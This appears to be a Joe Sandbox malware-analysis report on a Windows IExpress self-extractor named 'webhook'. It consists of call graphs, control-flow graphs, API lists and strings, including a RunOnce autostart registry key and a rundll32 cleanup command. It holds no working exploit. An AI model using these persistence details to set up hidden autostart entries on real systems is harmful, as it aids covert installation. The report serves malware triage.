7ff6505465b8 2807->3036 2812 7ff6505461e8 24 API calls 2808->2812 2811 7ff6505476fe 2809->2811 2813 7ff6505476ba LocalFree 2811->2813 2814 7ff6505476ab FreeLibrary 2812->2814 2815 7ff650546590 GetLastError 2813->2815 2814->2813 2815->2779 2816->2793 2817->2792 2819 7ff650544836 2818->2819 2819->2346 2825 7ff650547c16 2820->2825 2821 7ff65054366c _vsnprintf 2822 7ff650547c75 FindResourceA 2821->2822 2823 7ff650547c97 2822->2823 2824 7ff650547bea LoadResource LockResource 2822->2824 2826 7ff6505413e0 7 API calls 2823->2826 2824->2823 2824->2825 2825->2821 2828 7ff650547c99 FreeResource 2825->2828 2829 7ff650547c4e FreeResource 2825->2829 2827 7ff650547cc4 2826->2827 2827->2363 2828->2823 2829->2825 2831 7ff650545140 7 API calls 2830->2831 2832 7ff650544e4f LocalAlloc 2831->2832 2833 7ff650544e91 2832->2833 2834 7ff650544e71 2832->2834 2836 7ff650545140 7 API calls 2833->2836 2835 7ff6505461e8 24 API calls 2834->2835 2838 7ff650544e8f 2835->2838 2837 7ff650544ea3 2836->2837 2839 7ff650544ea7 2837->2839 2840 7ff650544ebd lstrcmpA 2837->2840 2838->2346 2842 7ff6505461e8 24 API calls 2839->2842 2840->2839 2841 7ff650544ef6 LocalFree 2840->2841 2841->2838 2842->2841 2844 7ff65054421e 2843->2844 2846 7ff6505442e5 2843->2846 2873 7ff650544fd8 2844->2873 2884 7ff650545ed8 2846->2884 2847 7ff650544362 2850 7ff6505413e0 7 API calls 2847->2850 2854 7ff6505443ae 2850->2854 2852 7ff65054427f GetSystemInfo 2866 7ff650544299 2852->2866 2853 7ff6505442d4 2858 7ff65054887c CharPrevA 2853->2858 2854->2681 2867 7ff65054332c GetWindowsDirectoryA 2854->2867 2855 7ff650544351 2857 7ff650545b50 38 API calls 2855->2857 2856 7ff650544332 CreateDirectoryA 2859 7ff650544347 2856->2859 2860 7ff650544370 2856->2860 2861 7ff65054435e 2857->2861 2858->2846 2859->2855 2862 7ff650546590 GetLastError 2860->2862 2861->2847 2865 7ff650544386 RemoveDirectoryA 2861->2865 2864 7ff650544375 2862->2864 2863 7ff65054887c CharPrevA 2863->2853 2864->2847 2865->2847 2866->2853 2866->2863 2868 7ff650543388 2867->2868 2869 7ff65054336a 2867->2869 2871 7ff6505413e0 7 API calls 2868->2871 2870 7ff6505461e8 24 API calls 2869->2870 2870->2868 2872 7ff6505433a3 2871->2872 2872->2693 2872->2701 2875 7ff65054500f 2873->2875 2876 7ff65054887c CharPrevA 2875->2876 2879 7ff6505450a0 GetTempFileNameA 2875->2879 2896 7ff65054366c 2875->2896 2877 7ff650545071 RemoveDirectoryA GetFileAttributesA 2876->2877 2877->2875 2878 7ff650545110 CreateDirectoryA 2877->2878 2878->2879 2880 7ff6505450e5 2878->2880 2879->2880 2881 7ff6505450c0 DeleteFileA CreateDirectoryA 2879->2881 2882 7ff6505413e0 7 API calls 2880->2882 2881->2880 2883 7ff650544228 2882->2883 2883->2847 2883->2852 2883->2853 2885 7ff650545ef3 2884->2885 2885->2885 2886 7ff650545efc LocalAlloc 2885->2886 2887 7ff650545f1c 2886->2887 2891 7ff650545f5d 2886->2891 2888 7ff6505461e8 24 API calls 2887->2888 2890 7ff650545f3a 2888->2890 2889 7ff65054887c CharPrevA 2892 7ff650545fb6 CreateFileA LocalFree 2889->2892 2893 7ff650546590 GetLastError 2890->2893 2895 7ff65054432e 2890->2895 2891->2889 2892->2890 2894 7ff650546002 CloseHandle GetFileAttributesA 2892->2894 2893->2895 2894->2890 2895->2855 2895->2856 2897 7ff65054369b _vsnprintf 2896->2897 2898 7ff65054368c 2896->2898 2897->2898 2898->2875 2900 7ff6505428e5 2899->2900 2901 7ff650542922 2899->2901 2904 7ff65054366c _vsnprintf 2900->2904 2902 7ff650542927 2901->2902 2903 7ff65054296b 2901->2903 2905 7ff65054366c _vsnprintf 2902->2905 2906 7ff65054291d 2903->2906 2909 7ff65054366c _vsnprintf 2903->2909 2907 7ff6505428fd 2904->2907 2908 7ff65054293f 2905->2908 2910 7ff6505413e0 7 API calls 2906->2910 2911 7ff6505461e8 24 API calls 2907->2911 2912 7ff6505461e8 24 API calls 2908->2912 2913 7ff650542987 2909->2913 2914 7ff6505429c9 2910->2914 2911->2906 2912->2906 2915 7ff6505461e8 24 API calls 2913->2915 2914->2737 2915->2906 2917 7ff650542fcd RegQueryInfoKeyA RegCloseKey 2916->2917 2918 7ff650543031 2916->2918 2917->2918 2918->2748 2920 7ff6505430eb 2919->2920 2921 7ff650543081 2919->2921 2923 7ff6505413e0 7 API calls 2920->2923 2922 7ff65054887c CharPrevA 2921->2922 2924 7ff650543094 WritePrivateProfileStringA _lopen 2922->2924 2925 7ff6505430fd 2923->2925 2924->2920 2926 7ff6505430c7 _llseek _lclose 2924->2926 2925->2748 2926->2920 2928 7ff650547eb5 2927->2928 2938 7ff650547f2a 2927->2938 2939 7ff650548400 2928->2939 2930 7ff6505413e0 7 API calls 2932 7ff650544cab 2930->2932 2932->2759 2932->2760 2933 7ff650547ed5 #21 2934 7ff650547ef0 2933->2934 2933->2938 2934->2938 2951 7ff650548160 2934->2951 2937 7ff650547f17 #23 2937->2938 2938->2930 2940 7ff65054843a 2939->2940 2941 7ff65054847d lstrcmpA 2940->2941 2942 7ff650548450 2940->2942 2944 7ff650547ecc 2941->2944 2945 7ff6505484d4 2941->2945 2943 7ff6505461e8 24 API calls 2942->2943 2943->2944 2944->2933 2944->2938 2945->2944 2946 7ff650548528 CreateFileA 2945->2946 2946->2944 2948 7ff65054855e 2946->2948 2947 7ff6505485e1 CreateFileA 2947->2944 2948->2944 2948->2947 2949 7ff6505485c9 CharNextA 2948->2949 2950 7ff6505485b2 CreateDirectoryA 2948->2950 2949->2948 2950->2949 2952 7ff650548194 CloseHandle 2951->2952 2953 7ff650547f12 2951->2953 2952->2953 2953->2937 2953->2938 2955 7ff650541d7d 2954->2955 3046 7ff650542c98 2955->3046 2958 7ff65054887c CharPrevA 2960 7ff650541e10 2958->2960 2959 7ff650548a2c 2 API calls 2961 7ff650541eb3 2959->2961 2960->2959 2962 7ff650541ebc CompareStringA 2961->2962 2963 7ff650542102 2961->2963 2962->2963 2965 7ff650541eef GetFileAttributesA 2962->2965 2964 7ff650548a2c 2 API calls 2963->2964 2966 7ff65054210f 2964->2966 2967 7ff650541f09 2965->2967 2968 7ff6505420da 2965->2968 2969 7ff650542118 CompareStringA 2966->2969 2970 7ff6505421b2 LocalAlloc 2966->2970 2967->2968 2973 7ff650542c98 2 API calls 2967->2973 2972 7ff6505461e8 24 API calls 2968->2972 2969->2970 2978 7ff650542147 2969->2978 2970->2968 2971 7ff6505421d2 GetFileAttributesA 2970->2971 2981 7ff6505421e8 2971->2981 2991 7ff650541ff5 2972->2991 2974 7ff650541f27 2973->2974 2976 7ff650541f51 LocalAlloc 2974->2976 2979 7ff650542c98 2 API calls 2974->2979 2975 7ff6505422b1 2977 7ff6505413e0 7 API calls 2975->2977 2976->2968 2980 7ff650541f77 GetPrivateProfileIntA GetPrivateProfileStringA 2976->2980 2982 7ff6505422cd 2977->2982 2978->2978 2983 7ff650542168 LocalAlloc 2978->2983 2979->2976 2984 7ff65054206f 2980->2984 2980->2991 2992 7ff65054223b 2981->2992 2982->2789 2983->2968 2988 7ff650542199 2983->2988 2986 7ff650542080 GetShortPathNameA 2984->2986 2987 7ff6505420a2 2984->2987 2986->2987 2990 7ff65054366c _vsnprintf 2987->2990 2989 7ff65054366c _vsnprintf 2988->2989 2989->2991 2990->2991 2991->2975 3054 7ff650542a10 2992->3054 2994 7ff650541aac 2993->2994 2995 7ff650541cf2 2993->2995 2997 7ff65054366c _vsnprintf 2994->2997 3001 7ff650541b05 2994->3001 2996 7ff6505413e0 7 API calls 2995->2996 2998 7ff650541d01 2996->2998 2999 7ff650541acd RegQueryValueExA 2997->2999 2998->2789 2999->2994 3000 7ff650541b24 GetSystemDirectoryA 2999->3000 3002 7ff65054887c CharPrevA 3000->3002 3001->3000 3003 7ff650541b07 RegCloseKey 3001->3003 3004 7ff650541b48 LoadLibraryA 3002->3004 3003->2995 3005 7ff650541c30 GetModuleFileNameA 3004->3005 3006 7ff650541b64 GetProcAddress FreeLibrary 3004->3006 3007 7ff650541c53 RegCloseKey 3005->3007 3011 7ff650541bc2 3005->3011 3006->3005 3008 7ff650541b98 GetSystemDirectoryA 3006->3008 3007->2995 3009 7ff650541baf 3008->3009 3008->3011 3010 7ff65054887c CharPrevA 3009->3010 3010->3011 3011->3011 3012 7ff650541beb LocalAlloc 3011->3012 3013 7ff650541c69 3012->3013 3014 7ff650541c10 3012->3014 3016 7ff65054366c _vsnprintf 3013->3016 3015 7ff6505461e8 24 API calls 3014->3015 3017 7ff650541c2e 3015->3017 3018 7ff650541c9d 3016->3018 3017->3007 3018->3018 3019 7ff650541ca6 RegSetValueExA RegCloseKey LocalFree 3018->3019 3019->2995 3021 7ff650547048 3020->3021 3022 7ff65054704f CreateProcessA 3020->3022 3027 7ff6505413e0 7 API calls 3021->3027 3023 7ff650547181 3022->3023 3024 7ff6505470a5 WaitForSingleObject GetExitCodeProcess 3022->3024 3026 7ff650546590 GetLastError 3023->3026 3025 7ff6505470dc 3024->3025 3032 7ff650542540 19 API calls 3025->3032 3035 7ff65054710d 3025->3035 3028 7ff650547186 GetLastError FormatMessageA 3026->3028 3029 7ff6505471fd 3027->3029 3030 7ff6505461e8 24 API calls 3028->3030 3029->2789 3030->3021 3031 7ff65054714a CloseHandle CloseHandle 3031->3021 3033 7ff650547178 3031->3033 3032->3035 3033->3021 3034 7ff650547140 3034->3031 3035->3031 3035->3034 3037 7ff6505465ed 3036->3037 3038 7ff65054887c CharPrevA 3037->3038 3039 7ff65054662b GetFileAttributesA 3038->3039 3040 7ff650546641 3039->3040 3041 7ff65054665e LoadLibraryA 3039->3041 3040->3041 3042 7ff650546645 LoadLibraryExA 3040->3042 3043 7ff650546671 3041->3043 3042->3043 3044 7ff6505413e0 7 API calls 3043->3044 3045 7ff650546681 3044->3045 3045->2807 3047 7ff650542cb9 3046->3047 3049 7ff650542cd1 3047->3049 3050 7ff650541dd7 3047->3050 3068 7ff6505489bc 3047->3068 3051 7ff6505489bc 2 API calls 3049->3051 3050->2958 3050->2960 3052 7ff650542cdf 3051->3052 3052->3050 3053 7ff6505489bc 2 API calls 3052->3053 3053->3052 3055 7ff650542a47 3054->3055 3056 7ff650542c69 3054->3056 3055->3056 3057 7ff650542a50 GetModuleFileNameA 3055->3057 3058 7ff6505413e0 7 API calls 3056->3058 3057->3056 3067 7ff650542a78 3057->3067 3059 7ff650542c7c 3058->3059 3059->2975 3060 7ff650542a7c IsDBCSLeadByte 3060->3067 3061 7ff650542c3b CharNextA 3064 7ff650542c4d CharNextA 3061->3064 3062 7ff650542aa1 CharNextA CharUpperA 3063 7ff650542b95 CharUpperA 3062->3063 3062->3067 3063->3067 3064->3056 3064->3060 3066 7ff650542ae6 CharPrevA 3066->3067 3067->3060 3067->3061 3067->3062 3067->3064 3067->3066 3073 7ff650548914 3067->3073 3069 7ff6505489d4 3068->3069 3070 7ff650548a0d 3069->3070 3071 7ff6505489f6 CharNextA 3069->3071 3072 7ff6505489de IsDBCSLeadByte 3069->3072 3070->3047 3071->3069 3072->3069 3072->3070 3074 7ff65054892c 3073->3074 3074->3074 3075 7ff650548935 CharPrevA 3074->3075 3076 7ff650548951 CharPrevA 3075->3076 3077 7ff650548968 3076->3077 3078 7ff650548949 3076->3078 3079 7ff650548972 CharPrevA 3077->3079 3080 7ff65054899b 3077->3080 3081 7ff650548989 CharNextA 3077->3081 3078->3076 3078->3079 3079->3080 3079->3081 3080->3067 3081->3080 3315 7ff650546e4f 3316 7ff650546e9d 3315->3316 3317 7ff65054887c CharPrevA 3316->3317 3318 7ff650546ed5 CreateFileA 3317->3318 3319 7ff650546f10 3318->3319 3320 7ff650546f1e WriteFile 3318->3320 3323 7ff6505413e0 7 API calls 3319->3323 3321 7ff650546f42 CloseHandle 3320->3321 3321->3319 3324 7ff650546f75 3323->3324 3325 7ff65054604e 3326 7ff65054614c 3325->3326 3329 7ff650546062 3325->3329 3327 7ff650546145 3326->3327 3328 7ff650546155 SendDlgItemMessageA 3326->3328 3328->3327 3330 7ff65054606f 3329->3330 3332 7ff6505460a1 GetDesktopWindow 3329->3332 3330->3327 3331 7ff650546090 EndDialog 3330->3331 3331->3327 3333 7ff650543c8c 14 API calls 3332->3333 3334 7ff6505460b8 6 API calls 3333->3334 3334->3327 3335 7ff65054100e 3337 7ff650541022 3335->3337 3342 7ff650541798 GetModuleHandleW 3337->3342 3338 7ff650541089 __set_app_type 3339 7ff6505410c6 3338->3339 3340 7ff6505410dc 3339->3340 3341 7ff6505410cf __setusermatherr 3339->3341 3341->3340 3343 7ff6505417ad 3342->3343 3343->3338 3344 7ff65054170e SetUnhandledExceptionFilter 3345 7ff65054870e 3347 7ff650548718 3345->3347 3346 7ff65054876d SetFilePointer 3348 7ff65054872c 3346->3348 3347->3346 3347->3348 3095 7ff6505481d1 3096 7ff65054821c 3095->3096 3097 7ff650548205 3095->3097 3100 7ff650548316 3096->3100 3102 7ff650548213 3096->3102 3104 7ff650548232 3096->3104 3098 7ff650548160 CloseHandle 3097->3098 3097->3102 3098->3102 3099 7ff6505413e0 7 API calls 3101 7ff6505483bb 3099->3101 3103 7ff650548322 SetDlgItemTextA 3100->3103 3105 7ff650548337 3100->3105 3102->3099 3103->3105 3104->3102 3106 7ff650548273 DosDateTimeToFileTime 3104->3106 3105->3102 3120 7ff650544140 GetFileAttributesA 3105->3120 3106->3102 3108 7ff650548290 LocalFileTimeToFileTime 3106->3108 3108->3102 3110 7ff6505482ae SetFileTime 3108->3110 3110->3102 3111 7ff6505482d6 3110->3111 3113 7ff650548160 CloseHandle 3111->3113 3112 7ff650548400 29 API calls 3114 7ff65054837b 3112->3114 3116 7ff6505482df SetFileAttributesA 3113->3116 3114->3102 3115 7ff650548388 3114->3115 3127 7ff6505437dc LocalAlloc 3115->3127 3116->3102 3121 7ff6505441d3 3120->3121 3123 7ff650544163 3120->3123 3121->3102 3121->3112 3122 7ff6505441bf SetFileAttributesA 3122->3121 3123->3121 3123->3122 3124 7ff6505464b0 28 API calls 3123->3124 3125 7ff6505441a6 3124->3125 3125->3121 3125->3122 3126 7ff6505441b9 3125->3126 3126->3122 3128 7ff65054380a 3127->3128 3129 7ff650543834 LocalAlloc 3127->3129 3130 7ff6505461e8 24 API calls 3128->3130 3131 7ff65054382d 3129->3131 3133 7ff650543863 3129->3133 3130->3131 3131->3102 3134 7ff6505461e8 24 API calls 3133->3134 3135 7ff650543886 LocalFree 3134->3135 3135->3131

                          Callgraph

                          • Executed
                          • Not Executed
                          • Opacity -> Relevance
                          • Disassembly available
                          callgraph 0 Function_00007FF650541798 33 Function_00007FF65054173C 0->33 1 Function_00007FF650542C98 97 Function_00007FF6505489BC 1->97 2 Function_00007FF650544598 11 Function_00007FF6505464B0 2->11 22 Function_00007FF650546590 2->22 35 Function_00007FF650545140 2->35 84 Function_00007FF6505461E8 2->84 3 Function_00007FF65054499E 20 Function_00007FF650543C8C 3->20 26 Function_00007FF650547F58 3->26 3->84 4 Function_00007FF65054619E 5 Function_00007FF65054669E 5->20 6 Function_00007FF6505487A0 6->26 7 Function_00007FF650548DA0 8 Function_00007FF650543BA8 9 Function_00007FF6505435A8 8->9 10 Function_00007FF650548AA9 11->84 12 Function_00007FF6505418B0 13 Function_00007FF650548BB4 77 Function_00007FF6505413E0 13->77 14 Function_00007FF6505478AE 15 Function_00007FF65054887C 14->15 14->20 42 Function_00007FF650545B50 14->42 44 Function_00007FF650543950 14->44 72 Function_00007FF650545ED8 14->72 14->84 15->9 16 Function_00007FF650548D7C 16->7 17 Function_00007FF65054137E 18 Function_00007FF650541782 19 Function_00007FF650542F8C 20->77 21 Function_00007FF650541890 23 Function_00007FF650546F90 24 Function_00007FF650542590 24->77 25 Function_00007FF650548E90 27 Function_00007FF650548159 28 Function_00007FF650548160 29 Function_00007FF650548660 30 Function_00007FF650548E60 31 Function_00007FF650546768 31->15 31->23 54 Function_00007FF650548A2C 31->54 74 Function_00007FF6505429DC 31->74 31->77 93 Function_00007FF6505415B8 31->93 31->97 32 Function_00007FF65054366C 34 Function_00007FF65054143B 60 Function_00007FF650541404 34->60 36 Function_00007FF650542540 73 Function_00007FF6505434D8 36->73 37 Function_00007FF650544140 37->11 38 Function_00007FF65054813E 39 Function_00007FF650543044 39->15 39->77 40 Function_00007FF65054114B 43 Function_00007FF650541850 40->43 81 Function_00007FF650547FE4 40->81 82 Function_00007FF6505418E4 40->82 41 Function_00007FF650541150 41->43 41->81 41->82 42->22 42->77 42->84 95 Function_00007FF6505428B8 42->95 43->12 59 Function_00007FF650541800 43->59 44->84 45 Function_00007FF650546E4F 45->15 45->77 46 Function_00007FF65054604E 46->20 47 Function_00007FF650543118 47->24 47->77 48 Function_00007FF650544F18 48->35 48->84 94 Function_00007FF650547BB8 48->94 49 Function_00007FF65054521C 49->11 49->15 49->22 49->35 49->42 55 Function_00007FF65054332C 49->55 49->77 49->84 85 Function_00007FF6505441EC 49->85 50 Function_00007FF65054721C 50->15 50->22 50->32 50->35 52 Function_00007FF650541D28 50->52 62 Function_00007FF650541A08 50->62 64 Function_00007FF650547010 50->64 50->77 50->84 96 Function_00007FF6505465B8 50->96 51 Function_00007FF65054391B 52->1 52->9 52->15 52->32 52->54 65 Function_00007FF650542A10 52->65 52->77 52->84 53 Function_00007FF650547E28 53->28 61 Function_00007FF650548400 53->61 53->77 55->77 55->84 56 Function_00007FF650542D34 56->15 56->77 57 Function_00007FF650544E34 57->35 57->84 58 Function_00007FF6505483FA 58->84 61->84 62->15 62->32 62->77 62->84 63 Function_00007FF650545810 63->11 63->31 63->35 63->47 63->77 63->84 87 Function_00007FF650543DF0 63->87 92 Function_00007FF6505426B8 63->92 64->22 64->36 64->77 64->84 66 Function_00007FF650548914 65->66 65->77 67 Function_00007FF65054100E 67->0 88 Function_00007FF6505417F0 67->88 68 Function_00007FF65054170E 69 Function_00007FF65054870E 70 Function_00007FF6505483DA 70->77 71 Function_00007FF650544FD8 71->15 71->32 71->77 72->15 72->22 72->84 73->19 73->39 74->84 75 Function_00007FF6505437DC 75->84 76 Function_00007FF650544BE0 76->35 76->53 76->84 77->60 78 Function_00007FF650547CE0 79 Function_00007FF650548AE4 80 Function_00007FF650544BDE 80->35 80->53 80->84 81->36 81->63 83 Function_00007FF6505446E8 81->83 81->84 98 Function_00007FF6505433BC 81->98 103 Function_00007FF6505443CC 81->103 83->2 83->11 83->15 83->22 83->42 83->48 83->49 83->50 83->57 83->73 83->76 83->77 83->84 83->94 102 Function_00007FF6505456C8 83->102 84->13 84->32 84->77 84->79 85->15 85->22 85->42 85->71 85->72 85->77 86 Function_00007FF6505422F0 86->56 87->13 87->77 87->79 87->84 87->86 89 Function_00007FF6505410F0 90 Function_00007FF6505436EE 90->20 90->77 91 Function_00007FF6505419F2 92->9 92->15 92->77 92->92 93->60 94->32 94->77 95->32 95->77 95->84 96->15 96->77 98->77 98->84 99 Function_00007FF6505419BA 100 Function_00007FF6505416BE 101 Function_00007FF6505481CA 102->22 102->35 102->84 103->66 103->77 103->92 104 Function_00007FF6505481D1 104->8 104->28 104->37 104->61 104->75 104->77 104->78

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 7ff65054721c-7ff65054726e 1 7ff650547291-7ff650547299 0->1 2 7ff650547270-7ff650547282 call 7ff650545140 0->2 4 7ff65054729d-7ff6505472bf memset 1->4 5 7ff650547287-7ff65054728b 2->5 6 7ff6505472c5-7ff6505472e0 call 7ff650545140 4->6 7 7ff6505473e4-7ff6505473f7 4->7 5->1 9 7ff6505473b6-7ff6505473df call 7ff6505461e8 5->9 6->9 18 7ff6505472e6-7ff6505472ec 6->18 8 7ff6505473fb-7ff650547405 7->8 12 7ff650547419-7ff650547424 8->12 13 7ff650547407-7ff65054740d 8->13 19 7ff650547655 9->19 17 7ff650547427-7ff65054742a 12->17 13->12 16 7ff65054740f-7ff650547417 13->16 16->8 16->12 20 7ff65054742c-7ff650547444 call 7ff650545140 17->20 21 7ff65054748a-7ff65054749f call 7ff650541d28 17->21 22 7ff6505472ee-7ff6505472f3 18->22 23 7ff6505472f5-7ff6505472f8 18->23 27 7ff650547657-7ff650547686 call 7ff6505413e0 19->27 20->9 38 7ff65054744a-7ff650547451 20->38 21->19 35 7ff6505474a5-7ff6505474ac 21->35 29 7ff65054730d 22->29 24 7ff6505472fa-7ff650547303 23->24 25 7ff650547305-7ff650547307 23->25 24->29 30 7ff650547309 25->30 31 7ff650547310-7ff650547313 25->31 29->31 30->29 31->17 36 7ff650547319-7ff650547323 31->36 41 7ff6505474cc-7ff6505474ce 35->41 42 7ff6505474ae-7ff6505474b5 35->42 43 7ff65054738f-7ff650547392 36->43 44 7ff650547325-7ff650547328 36->44 39 7ff650547457-7ff650547484 CompareStringA 38->39 40 7ff65054773f-7ff650547746 38->40 39->21 39->40 49 7ff65054774c-7ff650547753 40->49 50 7ff650547894-7ff650547896 40->50 51 7ff6505475ff-7ff65054760b call 7ff650547010 41->51 52 7ff6505474d4-7ff6505474db 41->52 42->41 46 7ff6505474b7-7ff6505474be 42->46 43->21 45 7ff650547398-7ff6505473b0 call 7ff650545140 43->45 47 7ff65054732a-7ff650547331 44->47 48 7ff650547333-7ff650547335 44->48 45->9 45->21 46->41 55 7ff6505474c0-7ff6505474c2 46->55 56 7ff650547342-7ff650547353 call 7ff650545140 47->56 48->19 57 7ff65054733b 48->57 49->50 58 7ff650547759-7ff650547788 RegOpenKeyExA 49->58 50->27 62 7ff650547610-7ff650547612 51->62 59 7ff6505474e1-7ff6505474e3 52->59 60 7ff650547700-7ff65054773a call 7ff6505461e8 LocalFree 52->60 55->52 64 7ff6505474c4-7ff6505474c7 call 7ff650541a08 55->64 56->9 79 7ff650547355-7ff650547385 CompareStringA 56->79 57->56 58->50 65 7ff65054778e-7ff6505477cd RegQueryValueExA 58->65 59->51 67 7ff6505474e9-7ff6505474f0 59->67 60->19 68 7ff650547646-7ff650547650 LocalFree 62->68 69 7ff650547614-7ff65054762a LocalFree 62->69 64->41 72 7ff650547883-7ff65054788f RegCloseKey 65->72 73 7ff6505477d3-7ff650547802 memset GetSystemDirectoryA 65->73 67->51 75 7ff6505474f6-7ff650547501 call 7ff6505465b8 67->75 68->19 69->40 76 7ff650547630-7ff650547635 69->76 72->50 77 7ff65054781a-7ff650547843 call 7ff65054366c 73->77 78 7ff650547804-7ff650547815 call 7ff65054887c 73->78 86 7ff650547507-7ff650547523 GetProcAddress 75->86 87 7ff6505476db-7ff6505476fe call 7ff6505461e8 75->87 76->4 88 7ff65054784a-7ff650547851 77->88 78->77 79->43 83 7ff650547387-7ff65054738a 79->83 83->21 89 7ff650547529-7ff650547577 86->89 90 7ff650547688-7ff6505476b5 call 7ff6505461e8 FreeLibrary 86->90 97 7ff6505476ba-7ff6505476d6 LocalFree call 7ff650546590 87->97 88->88 92 7ff650547853-7ff65054787e RegSetValueExA 88->92 93 7ff650547579-7ff65054757d 89->93 94 7ff650547581-7ff650547589 89->94 90->97 92->72 93->94 98 7ff65054758b-7ff65054758f 94->98 99 7ff650547593-7ff650547595 94->99 97->19 98->99 101 7ff650547597-7ff65054759b 99->101 102 7ff65054759f-7ff6505475a7 99->102 101->102 105 7ff6505475a9-7ff6505475ad 102->105 106 7ff6505475b1-7ff6505475b3 102->106 105->106 107 7ff6505475bd-7ff6505475ea 106->107 108 7ff6505475b5-7ff6505475b9 106->108 110 7ff6505475ec-7ff6505475fd FreeLibrary 107->110 111 7ff65054763a-7ff650547641 FreeLibrary 107->111 108->107 110->69 111->68
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                          • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                          • API String ID: 2679723528-3510600114
                          • Opcode ID: 5faff083ef84e0ac4e652a791b24264bbf5c15901bde1c5e60f4bd780682b69e
                          • Instruction ID: 89346d8300775adede97a5592df4272997572bb6cd45f5c96a6e7051c76b2fb4
                          • Opcode Fuzzy Hash: 5faff083ef84e0ac4e652a791b24264bbf5c15901bde1c5e60f4bd780682b69e
                          • Instruction Fuzzy Hash: 6E029E71A08B47B6EB608F24EA402F97BA0FB84744F481135DA8DA37A4DF7CE564CB00

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery
                          • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                          • API String ID: 1522771004-3726664654
                          • Opcode ID: 4787bf835d2d00f0f2994409a2d2f4fd237c0eb5fe9aa116df46f60fe985a84b
                          • Instruction ID: cfe498abbf5cb72c1e87af6f42a38d3143d12d01129da7767c1dc60048c3e583
                          • Opcode Fuzzy Hash: 4787bf835d2d00f0f2994409a2d2f4fd237c0eb5fe9aa116df46f60fe985a84b
                          • Instruction Fuzzy Hash: 83816D36A18B83B6E7108F21E9442F9BBA0FB89B54F885235DA8E93754DF3CD525C700

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 144 7ff650541d28-7ff650541d7a 145 7ff650541d7d-7ff650541d87 144->145 146 7ff650541d89-7ff650541d8f 145->146 147 7ff650541d9c-7ff650541dae 145->147 146->147 148 7ff650541d91-7ff650541d9a 146->148 149 7ff650541dbd-7ff650541dc4 147->149 150 7ff650541db0-7ff650541dbb 147->150 148->145 148->147 151 7ff650541dc8-7ff650541de6 call 7ff650542c98 149->151 150->151 154 7ff650541de8 151->154 155 7ff650541e52-7ff650541e64 151->155 156 7ff650541deb-7ff650541df2 154->156 157 7ff650541e69-7ff650541e73 155->157 156->156 158 7ff650541df4-7ff650541df8 156->158 159 7ff650541e88-7ff650541ea1 call 7ff65054887c 157->159 160 7ff650541e75-7ff650541e7b 157->160 158->155 162 7ff650541dfa-7ff650541e01 158->162 164 7ff650541ea6-7ff650541eb6 call 7ff650548a2c 159->164 160->159 163 7ff650541e7d-7ff650541e86 160->163 165 7ff650541e08-7ff650541e0a 162->165 166 7ff650541e03-7ff650541e06 162->166 163->157 163->159 172 7ff650541ebc-7ff650541ee9 CompareStringA 164->172 173 7ff650542102-7ff650542112 call 7ff650548a2c 164->173 165->155 169 7ff650541e0c-7ff650541e0e 165->169 166->165 168 7ff650541e10-7ff650541e20 166->168 171 7ff650541e23-7ff650541e2d 168->171 169->155 169->168 174 7ff650541e2f-7ff650541e35 171->174 175 7ff650541e42-7ff650541e50 171->175 172->173 177 7ff650541eef-7ff650541f03 GetFileAttributesA 172->177 182 7ff650542118-7ff650542145 CompareStringA 173->182 183 7ff6505421b2-7ff6505421d0 LocalAlloc 173->183 174->175 178 7ff650541e37-7ff650541e40 174->178 175->164 180 7ff650541f09-7ff650541f0b 177->180 181 7ff6505420da-7ff6505420e2 177->181 178->171 178->175 180->181 184 7ff650541f11-7ff650541f2d call 7ff650542c98 180->184 185 7ff6505420e7-7ff6505420fd call 7ff6505461e8 181->185 182->183 189 7ff650542147-7ff65054214e 182->189 186 7ff650542189-7ff650542194 183->186 187 7ff6505421d2-7ff6505421e6 GetFileAttributesA 183->187 199 7ff650541f51-7ff650541f71 LocalAlloc 184->199 200 7ff650541f2f-7ff650541f4c call 7ff650542c98 184->200 197 7ff6505422be-7ff6505422e7 call 7ff6505413e0 185->197 186->185 191 7ff6505421e8-7ff6505421ea 187->191 192 7ff650542265-7ff65054226f 187->192 194 7ff650542151-7ff650542158 189->194 191->192 196 7ff6505421ec-7ff6505421fd 191->196 201 7ff650542276-7ff650542280 192->201 194->194 198 7ff65054215a 